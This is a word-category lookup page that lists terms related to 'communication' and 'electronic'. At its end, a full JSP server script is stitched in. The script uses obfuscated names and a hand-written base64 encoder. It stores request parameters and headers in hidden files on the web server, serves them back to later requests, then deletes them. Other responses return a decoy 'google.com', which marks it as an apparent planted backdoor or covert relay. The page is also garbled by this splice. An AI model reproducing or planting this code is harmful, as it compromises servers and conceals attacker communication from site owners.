Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Members for Fine-Grained Categories
electronic_communication
:
web,
instant_message,
security,
email,
spreadsheet,
telegram,
graphics,
cordless_phone,
letters,
voice,
question,
chart,
film,
communications,
broadcasting,
notice,
telephone_communications,
fax_machine,
medium,
manual,
application,
text_message,
video_phone,
timing,
sound,
language,
wireless_text,
electronic_document,
art,
sm,
swift_transmission,
active,
text,
telecommunication,
simulation,
data,
cellular_phone,
journal,
scale,
fire,
instant,
report,
web_transactions,
message,
cell_phone,
newspaper,
article,
magazine,
papers,
mobile,
phone,
catalog,
animation_video,
advertising,
hand,
bulletin-board_system,
newsletter,
scientific_journal,
multimedia,
video_tape,
email_encryption,
statement,
email_message,
contract,
picture,
discussion_forum,
order,
song,
telemetry,
internet_access,
structure,
electronic_mail,
record,
map,
movement,
sign,
email_address,
safety,
discussion,
spam,
invitation,
instructions,
chat-room_statement,
illustration,
instant_messaging,
cable,
name,
presentation,
face,
mobile_devices,
form,
note,
text_messaging,
cd,
cell,
software,
smiley_face,
url,
proposal,
post,
story,
power,
document,
book,
news,
paint,
invoice,
windows_messaging,
program,
correspondence,
forum,
display,
memo,
audio_broadcasting,
video,
noise,
resume,
usage,
graph,
availability,
production,
audio,
online_calendar,
letter,
music,
file,
drawing,
research_papers,
Modifiers matching
communication
:
scholarly,
visual,
non,
nonverbal,
level,
promotional,
electronic,
sensitive,
artistic,
written,
indoor,
simple,
outside,
personal,
unstructured,
intensive,
informal,
clinical,
adult,
internal,
conventional,
unwanted,
individual,
linguistic,
scientific,
future,
international,
commercial,
social,
explicit,
planned,
symbolic,
emotional,
radio,
interpersonal,
urgent,
broadband,
periodic,
remote,
specified,
expressive,
effective,
wireless,
shared,
universal,
traditional,
negative,
environmental,
popular,
good,
separate,
local,
out,
undesirable,
entrepreneurial,
technical,
concrete,
medical,
privileged,
formal,
graphic,
reflective,
creative,
online,
published,
positive,
collaborative,
political,
mobile,
constructive,
digital,
confidential,
outdoor,
meaningful,
passive,
complex,
academic,
important,
musical,
wired,
textual,
interactive,
corporate,
wan,
alternative,
modern,
primary,
natural,
private,
infrared,
authentic,
routine,
official,
relevant,
everyday,
original,
public,
basic,
external,
optical,
regular,
functional,
verbal,
electrical,
organizational,
global,
physical,
rich,
pictorial,
illegal,
vocal,
oral,
asynchronous,
accessible,
ongoing,
spiritual,
real,
general,
structured,
professional,
virtual,
cultural,
Simple categories matching
electronic
:
equipment,
database,
process,
scan,
device,
transmitter,
medium,
item,
surface,
equivalent,
text,
track,
marketing,
ic,
system,
pathogen,
knowledge,
relay,
entertainment,
card,
mechanism,
information,
currency,
component,
organizer,
feature,
transactions,
appliance,
structure,
unit,
signal,
part,
instrumentation,
means,
module,
works,
discovery,
container,
entity,
music,
gadget,
accessory,
service,
money,
technology,
article,
commodity,
interference,
action,
gizmo,
hardware,
protection,
quantity,
characteristic,
converter,
product,
organs,
metadata,
switch,
ballast,
gear,
interrupter,
recovery,
form,
light,
address,
meter,
messaging,
traffic,
delivery,
stuff,
cable,
widget,
scale,
content,
keyboard,
event,
machine,
indicator,
parameter,
weaponry,
recreation,
certificate,
collection,
contract,
vehicle,
resource,
control,
folder,
counter,
dictionary,
timer,
gauge,
scanner,
instrument,
controller,
circuitry,
memory,
artefact,
crystal,
property,
chemical,
valve,
survey,
fan,
state,
file,
request,
sound,
actuator,
circuit,
installation,
assembly,
payment,
theory,
transcription,
reader,
book,
utensil,
game,
copier,
journal,
representation,
threat,
sensor,
identification,
index,
record,
readout,
waste,
bell,
report,
subsystem,
display,
signature,
tool,
communications,
camera,
sign,
transducer,
cause,
commerce,
activity,
transmission,
reference,
tube,
literature,
carrier,
facility,
security,
map,
network,
paraphernalia,
image,
procedure,
object,
line,
mobility,
gift,
waveguide,
group,
transaction,
metal,
toy,
package,
data,
balance,
domain,
connector,
key,
apparatus,
source,
enclosure,
inductor,
measure,
publication,
newsletter,
screen,
mail,
assets,
detector,
behavior,
protocol,
presentation,
failure,
format,
input,
behaviour,
crime,
evidence,
thing,
devices,
substrate,
document,
credential,
phenomenon,
engineering,
agent,
amplifier,
periodical,
semiconductor,
copy,
location,
housing,
conductor,
block,
interaction,
production,
authorization,
communication,
noise,
catalog,
exchange,
material,
application,
message,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>